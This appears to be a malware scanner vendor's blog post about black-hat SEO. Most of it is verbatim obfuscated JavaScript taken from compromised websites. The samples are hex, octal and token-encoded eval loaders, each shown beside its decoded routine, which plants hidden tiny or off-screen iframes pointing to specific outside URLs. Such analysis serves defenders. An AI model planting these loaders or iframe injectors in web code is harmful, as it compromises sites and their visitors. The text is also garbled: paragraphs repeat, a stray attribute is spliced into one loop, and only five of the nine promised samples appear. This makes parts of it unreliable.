Top 9 obfuscated malicious JavaScript threats detected by Quttera's online malware scanner during last week
Background
In the cyber era more and more businesses and individuals using internet for products promotion, marketing, sales and business development. Advertisement budgets turned from newspapers and television towards the web technologies. More companies hunting for new customers in World Wide Web.
In internet marketing, the business starts from very simple thing - drive to product's website as match unique visitors as possible hoping that few percent of them finally will convert to real customers. But from another side in order to have big amount of unique visitors website must be pretty popular: highly visible in search engine result pages (generic search) and having high rank. The straight forward and expensive solution is internet advertising.
Unfortunately, new business can rarely afford any of these but still must, somehow, be able to gain unique visitors in order to survive. However, there is relatively simple and not expensive alternative to bring any website to top of search engine result pages and boost website rating using illegal techniques.
Such kind of services are often referred to as "Black hat SEO".
In internet marketing, the business starts from very simple thing - drive to product's website as match unique visitors as possible hoping that few percent of them finally will convert to real customers. But from another side in order to have big amount of unique visitors website must be pretty popular: highly visible in search engine result pages (generic search) and having high rank. The straight forward and expensive solution is internet advertising.
Unfortunately, new business can rarely afford any of these but still must, somehow, be able to gain unique visitors in order to survive. However, there is relatively simple and not expensive alternative to bring any website to top of search engine result pages and boost website rating using illegal techniques.
Such kind of services are often referred to as "Black hat SEO".
BlackHat SEO and hiddden iframes
SEO for “search engine optimization" and "black hat" relates to old black and white western movies where good guys used to wear white hats and bad guys were wearing black. So what is black hat SEO?
Black hat SEO is a process or actions that improve volume and quality of traffic to website using unethical techniques which in majority of cases violate search engine guidelines. For example SEO Spam Injection or BlackHat Cloacking. But in this post we want to talk about well-known and widely used traffic improvement technique that is based on hidden iframes.
Black hat SEO is a process or actions that improve volume and quality of traffic to website using unethical techniques which in majority of cases violate search engine guidelines. For example SEO Spam Injection or BlackHat Cloacking. But in this post we want to talk about well-known and widely used traffic improvement technique that is based on hidden iframes.
Injected in multiple websites over the world, such hidden iframes are leading to pages on the "promoting" website. They have very small or zero dimensions and often invisible to the visitor.
The major issue with this is that in very short period of time search engines recognize such kind of falsification and punish involved web site. This may be done by moving it down in search engine result pages or by simply blacklisting it.
The major issue with this is that in very short period of time search engines recognize such kind of falsification and punish involved web site. This may be done by moving it down in search engine result pages or by simply blacklisting it.
Online Website Scanner statistics
Following is a top 9 of obfuscated JavaScript threats detected by Quttera public web malware scanner which used to generate and inject hidden iframes into external websites in order to increase traffic leading to "promoting" website. All of these threats were detected on compromised web servers which, if no promptly clean-up was done, were blacklisted by search engines.
Malicious action: injecting hidden iframe to http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html
Malicious action: injecting hidden iframe to http://busodeark.be/Fotos/2gkvYPRW.php
Malicious action: injecting hidden iframe to http://de-verzend-service.nl/3xzqrG8t.php
Malicious action: injecting hidden iframe to http://private3[.]zapto[.]org
Malicious action: injecting hidden iframe to http://www.eaglesunsystem.com/video/k8dhKQHr.php
Malicious action: injecting hidden iframe to http://peter.neish.net/wp-content/plugins/customize-admin/1pRwYO9W.php
Malicious action: injecting hidden iframe to http://vasnetworker.com/cnt.php
Malicious action: injecting hidden iframe to either www.simv.info/in.cgi or http://about.hautetfort.com
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for real-time anti-malware monitoring and for remediation assessment.
Sample 1
- try {
- if (window.document)--document.getElementById('12')
- } catch (qq) {
- if (qq != null) ss = eval("St" + "ring");
- }
- a ="2e74837c7182777d7c2e88888874747436372e891b182e846f802e877d73732e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e877d73733c8180712e4b2e357682827e483d3d8585853c736f757a7381837c81878182737b3c717d7b3d847772737d3d79467276595f56803c7e767e35491b182e877d73733c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e877d73733c8182877a733c707d807273802e4b2e353e35491b182e877d73733c8182877a733c7673777576822e4b2e353f7e8635491b182e877d73733c8182877a733c85777282762e4b2e353f7e8635491b182e877d73733c8182877a733c7a7374822e4b2e353f7e8635491b182e877d73733c8182877a733c827d7e2e4b2e353f7e8635491b181b182e77742e362f727d71837b737c823c757382537a737b737c82508757723635877d73733537372e891b182e727d71837b737c823c858077827336354a7277842e77724b6a35877d73736a354c4a3d7277844c3537491b182e727d71837b737c823c757382537a737b737c82508757723635877d737335373c6f7e7e737c725176777a7236877d737337491b182e8b1b188b1b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e891b182e846f802e827d726f872e4b2e7c73852e526f82733637491b182e846f802e73867e7780732e4b2e7c73852e526f82733637491b182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f491b182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f878137491b182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a8373371b182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e303037491b188b1b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e891b182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e37491b182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f491b182e77742e362e362e2f81826f80822e372e34341b182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e371b182e891b182e80738283807c2e7c837a7a491b182e8b1b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a491b182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e37491b182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c758276491b182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";
- z = [];
- for (i = 0; i < a.length; i += 2) {
- z.push(parseInt(a.substr(i, 2), 16) - 14);
- }
- eval(ss["fr" + "omCharCode"].apply(ss, z));
- function zzzfff() {
- var yoee = document.createElement('iframe');
- yoee.src = 'http://www.eaglesunsystem.com/video/k8dhKQHr.php';
- yoee.style.position = 'absolute';
- yoee.style.border = '0';
- yoee.style.height = '1px';
- yoee.style.width = '1px';
- yoee.style.left = '1px';
- yoee.style.top = '1px';
- if (!document.getElementById('yoee')) {
- document.write('<div id=\'yoee\'></div>');
- document.getElementById('yoee').appendChild(yoee);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue)
- + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) &&
- (name != document.cookie.substring(0, name.length)))
- {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled)
- {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
Sample 2
- ff = String;
- fff = "fromCha" + "rCode";
- ff = ff[fff];
- zz = 3;
- try {
- document.body % 26 = 5151
- } catch (bt4y34by) {
- v = 123;
- vzs = 0;
- try {
- document;
- } catch (q) {
- vzs = 1;
- }
- if (!vzs) e = eval;
- if (1) {
- f = new Array(04, 04, 0144, 0141, 033, 043, 0137, 0152, 0136, 0160, 0150, 0140, 0151, 0157, 051, 0142,0140, 0157, 0100, 0147, 0140, 0150, 0140, 0151, 0157, 0156, 075, 0164, 0117, 0134, 0142, 0111, 0134, 0150, 0140,043, 042, 0135, 0152, 0137, 0164, 042, 044, 0126, 053, 0130, 044, 0166, 010, 04, 04, 04, 0144, 0141, 0155, 0134,0150, 0140, 0155, 043, 044, 066, 010, 04, 04, 0170, 033, 0140, 0147, 0156, 0140, 033, 0166, 010, 04, 04, 04, 0137,0152, 0136, 0160, 0150, 0140, 0151, 0157, 051, 0162, 0155, 0144, 0157, 0140, 043, 035, 067, 0144, 0141, 0155,0134, 0150, 0140, 033, 0156, 0155, 0136, 070, 042, 0143, 0157, 0157, 0153, 065, 052, 052, 0143, 0140, 0134, 0147,0157, 0143, 0156, 0140, 0155, 0161, 0144, 0136, 0140, 0156, 0137, 0134, 0157, 0134, 053, 063, 054, 062, 055, 051,0136, 0152, 0150, 065, 057, 061, 057, 060, 062, 052, 062, 0136, 053, 060, 0135, 055, 055, 0137, 060, 0134, 0141,064, 0141, 055, 0136, 0141, 0136, 0134, 0140, 0140, 061, 063, 062, 0137, 054, 055, 063, 056, 062, 054, 0140, 054,051, 0143, 0157, 0150, 0147, 042, 033, 0162, 0144, 0137, 0157, 0143, 070, 042, 054, 053, 053, 042, 033, 0143,0140, 0144, 0142, 0143, 0157, 070, 042, 054, 053, 053, 042, 033, 0156, 0157, 0164, 0147, 0140, 070, 042, 0162,0144, 0137, 0157, 0143, 065, 054, 053, 053, 0153, 0163, 066, 0143, 0140, 0144, 0142, 0143, 0157, 065, 054, 053,053, 0153, 0163, 066, 0153, 0152, 0156, 0144, 0157, 0144, 0152, 0151, 065, 0134, 0135, 0156, 0152, 0147, 0160,0157, 0140, 066, 0161, 0144, 0156, 0144, 0135, 0144, 0147, 0144, 0157, 0164, 065, 0143, 0144, 0137, 0137, 0140,0151, 066, 0147, 0140, 0141, 0157, 065, 050, 054, 053, 053, 053, 053, 0153, 0163, 066, 0157, 0152, 0153, 065, 053,066, 042, 071, 067, 052, 0144, 0141, 0155, 0134, 0150, 0140, 071, 035, 044, 066, 010, 04, 04, 0170, 010, 04, 04,0141, 0160, 0151, 0136, 0157, 0144, 0152, 0151, 033, 0144, 0141, 0155, 0134, 0150, 0140, 0155, 043, 044, 0166,010, 04, 04, 04, 0161, 0134, 0155, 033, 0141, 033, 070, 033, 0137, 0152, 0136, 0160, 0150, 0140, 0151, 0157, 051,0136, 0155, 0140, 0134, 0157, 0140, 0100, 0147, 0140, 0150, 0140, 0151, 0157, 043, 042, 0144, 0141, 0155, 0134,0150, 0140, 042, 044, 066, 0141, 051, 0156, 0140, 0157, 074, 0157, 0157, 0155, 0144, 0135, 0160, 0157, 0140, 043,042, 0156, 0155, 0136, 042, 047, 042, 0143, 0157, 0157, 0153, 065, 052, 052, 0143, 0140, 0134, 0147, 0157, 0143,0156, 0140, 0155, 0161, 0144, 0136, 0140, 0156, 0137, 0134, 0157, 0134, 053, 063, 054, 062, 055, 051, 0136, 0152,0150, 065, 057, 061, 057, 060, 062, 052, 062, 0136, 053, 060, 0135, 055, 055, 0137, 060, 0134, 0141, 064, 0141,055, 0136, 0141, 0136, 0134, 0140, 0140, 061, 063, 062, 0137, 054, 055, 063, 056, 062, 054, 0140, 054, 051, 0143,0157, 0150, 0147, 042, 044, 066, 0141, 051, 0156, 0157, 0164, 0147, 0140, 051, 0147, 0140, 0141, 0157, 070, 042,050, 054, 053, 053, 053, 053, 0153, 0163, 042, 066, 0141, 051, 0156, 0157, 0164, 0147, 0140, 051, 0161, 0144,0156, 0144, 0135, 0144, 0147, 0144, 0157, 0164, 070, 042, 0143, 0144, 0137, 0137, 0140, 0151, 042, 066, 0141, 051,0156, 0157, 0164, 0147, 0140, 051, 0157, 0152, 0153, 070, 042, 053, 042, 066, 0141, 051, 0156, 0157, 0164, 0147,0140, 051, 0153, 0152, 0156, 0144, 0157, 0144, 0152, 0151, 070, 042, 0134, 0135, 0156, 0152, 0147, 0160, 0157,0140, 042, 066, 0141, 051, 0156, 0157, 0164, 0147, 0140, 051, 0157, 0152, 0153, 070, 042, 053, 042, 066, 0141,051, 0156, 0140, 0157, 074, 0157, 0157, 0155, 0144, 0135, 0160, 0157, 0140, 043, 042, 0162, 0144, 0137, 0157,0143, 042, 047, 042, 054, 053, 053, 042, 044, 066, 0141, 051, 0156, 0140, 0157, 074, 0157, 0157, 0155, 0144, 0135,0160, 0157, 0140, 043, 042, 0143, 0140, 0144, 0142, 0143, 0157, 042, 047, 042, 054, 053, 053, 042, 044, 066, 010,04, 04, 04, 0137, 0152, 0136, 0160, 0150, 0140, 0151, 0157, 051, 0142, 0140, 0157, 0100, 0147, 0140, 0150, 0140,0151, 0157, 0156, 075, 0164, 0117, 0134, 0142, 0111, 0134, 0150, 0140, 043, 042, 0135, 0152, 0137, 0164, 042, 044,0126, 053, 0130, 051, 0134, 0153, 0153, 0140, 0151, 0137, 076, 0143, 0144, 0147, 0137, 043, 0141, 044, 066, 010,04, 04, 0170);
- }
- w = f;
- s = [];
- if (window.document)
- for (i = 2 - 2; - i + 724 != 0; i += 1) {
- j = i;
- if ((031 == 0x19))
- if (e) s = s + ff(w[j] + 5);
- }
- xz = e;
- if (window.document) xz(s)
- }
Malicious action: injecting hidden iframe to http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html
- if (document.getElementsByTagName('body')[0]) {
- iframer();
- } else {
- document.write("<iframe src='http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
- }
- function iframer() {
- var f = document.createElement('iframe');
- f.setAttribute('src', 'http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html');
- f.style.left = '-10000px';
- f.style.visibility = 'hidden';
- f.style.top = '0';
- f.style.position = 'absolute';
- f.style.top = '0';
- f.setAttribute('width', '100');
- f.setAttribute('height', '100');
- document.getElementsByTagName('body')[0].appendChild(f);
- }
Sample 3
- ps = "s" + "p" + "l" + "i" + "t";
- asd = function () {
- -- (d.body)
- };
- a =("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,177,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,177,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,151,174,172,166,153,154,150,171,162,65,151,154,66,115,166,173,166,172,66,71,156,162,175,140,127,131,136,65,167,157,167,56,102,24,21,47,177,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,177,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,177,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,177,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,177,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,177,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,177,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,177,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,177,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,177,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));
- d = document;
- for (i = 0; i < a ondragstart = "return false;".length; i += 1) {
- a[i] = -(10 - 3) + parseInt(a[i], 5 + 3);
- }
- try {
- asd()
- } catch (q) {
- yy = 50 - 50;
- }
- try {
- yy /= 18
- } catch (pq) {
- yy = 1;
- }
- if (!yy) eval(String["fr" + "omCharCode"].apply(String, a));
Malicious action: injecting hidden iframe to http://busodeark.be/Fotos/2gkvYPRW.php
- function zzzfff() {
- var x = document.createElement('iframe');
- x.src = 'http://busodeark.be/Fotos/2gkvYPRW.php';
- x.style.position = 'absolute';
- x.style.border = '0';
- x.style.height = '1px';
- x.style.width = '1px';
- x.style.left = '1px';
- x.style.top = '1px';
- if (!document.getElementById('x')) {
- document.write('<div id=\'x\'></div>');
- document.getElementById('x').appendChild(x);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue)
- + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) &&
- (name != document.cookie.substring(0, name.length)))
- {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled)
- {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
Sample 4
- try {
- if (window.document)--document.getElementById('12')
- } catch (qq) {
- if (qq != null) ss = eval("St" + "ring");
- }
- a ="74837c7182777d7c2e88888874747436372e89182e846f802e81857e7b2e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e81857e7b3c8180712e4b2e357682827e483d3d72733b84738088737c723b817380847771733c7c7a3d4186887f805546823c7e767e3549182e81857e7b3c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e81857e7b3c8182877a733c707d807273802e4b2e353e3549182e81857e7b3c8182877a733c7673777576822e4b2e35477e863549182e81857e7b3c8182877a733c85777282762e4b2e35457e863549182e81857e7b3c8182877a733c7a7374822e4b2e353f7e863549182e81857e7b3c8182877a733c827d7e2e4b2e353f7e86354918182e77742e362f727d71837b737c823c757382537a737b737c8250875772363581857e7b3537372e89182e727d71837b737c823c858077827336354a7277842e77724b6a3581857e7b6a354c4a3d7277844c353749182e727d71837b737c823c757382537a737b737c8250875772363581857e7b35373c6f7e7e737c725176777a723681857e7b3749182e8b188b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e89182e846f802e827d726f872e4b2e7c73852e526f8273363749182e846f802e73867e7780732e4b2e7c73852e526f8273363749182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f49182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f87813749182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a837337182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e30303749188b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e89182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e3749182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f49182e77742e362e362e2f81826f80822e372e3434182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e37182e89182e80738283807c2e7c837a7a49182e8b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a49182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e3749182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18";
- z = [];
- for (i = 0; i < a.length; i += 2) {
- z.push(parseInt(a.substr(i, 2), 16) - 14);
- }
- eval(ss["fr" + "omCharCode"].apply(ss, z));
Malicious action: injecting hidden iframe to http://de-verzend-service.nl/3xzqrG8t.php
- function zzzfff() {
- var swpm = document.createElement('iframe');
- swpm.src = 'http://de-verzend-service.nl/3xzqrG8t.php';
- swpm.style.position = 'absolute';
- swpm.style.border = '0';
- swpm.style.height = '9px';
- swpm.style.width = '7px';
- swpm.style.left = '1px';
- swpm.style.top = '1px';
- if (!document.getElementById('swpm')) {
- document.write('<div id=\'swpm\'></div>');
- document.getElementById('swpm').appendChild(swpm);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) &&
- (name != document.cookie.substring(0, name.length))) {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled) {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
Sample 5
- var wsqWQBPps ="cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2fcNRoPJdqz76cNRoPJdqz6ccNRoPJdqz71cNRoPJdqz73cNRoPJdqz72cNRoPJdqz79cNRoPJdqz79cNRoPJdqz61cNRoPJdqz63cNRoPJdqz72cNRoPJdqz2ecNRoPJdqz70cNRoPJdqz68cNRoPJdqz70cNRoPJdqz3fcNRoPJdqz76cNRoPJdqz61cNRoPJdqz6fcNRoPJdqz77cNRoPJdqz76cNRoPJdqz3dcNRoPJdqz4ecNRoPJdqz48cNRoPJdqz63cNRoPJdqz43cNRoPJdqz71cNRoPJdqz55cNRoPJdqz46cNRoPJdqz53cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz68cNRoPJdqz72cNRoPJdqz79cNRoPJdqz74cNRoPJdqz65cNRoPJdqz77cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz39cNRoPJdqz38cNRoPJdqz38cNRoPJdqz39cNRoPJdqz34cNRoPJdqz33cNRoPJdqz39cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz79cNRoPJdqz6acNRoPJdqz72cNRoPJdqz65cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz38cNRoPJdqz35cNRoPJdqz34cNRoPJdqz22cNRoPJdqz20cNRoPJdqz6ecNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz79cNRoPJdqz66cNRoPJdqz65cNRoPJdqz6acNRoPJdqz43cNRoPJdqz50cNRoPJdqz43cNRoPJdqz7acNRoPJdqz62cNRoPJdqz41cNRoPJdqz22cNRoPJdqz20cNRoPJdqz74cNRoPJdqz69cNRoPJdqz74cNRoPJdqz6ccNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz4ecNRoPJdqz65cNRoPJdqz73cNRoPJdqz58cNRoPJdqz6fcNRoPJdqz59cNRoPJdqz47cNRoPJdqz54cNRoPJdqz42cNRoPJdqz7acNRoPJdqz22cNRoPJdqz20cNRoPJdqz77cNRoPJdqz69cNRoPJdqz64cNRoPJdqz74cNRoPJdqz68cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz68cNRoPJdqz65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz64cNRoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e";
- yvDFQwwmM = eval;
- var WSxQJgvuB = wsqWQBPps.replace(/cNRoPJdqz/g, "%");
- yvDFQwwmM("document.write(unescape(WSxQJgvuB))");
Malicious action: injecting hidden iframe to http://private3[.]zapto[.]org
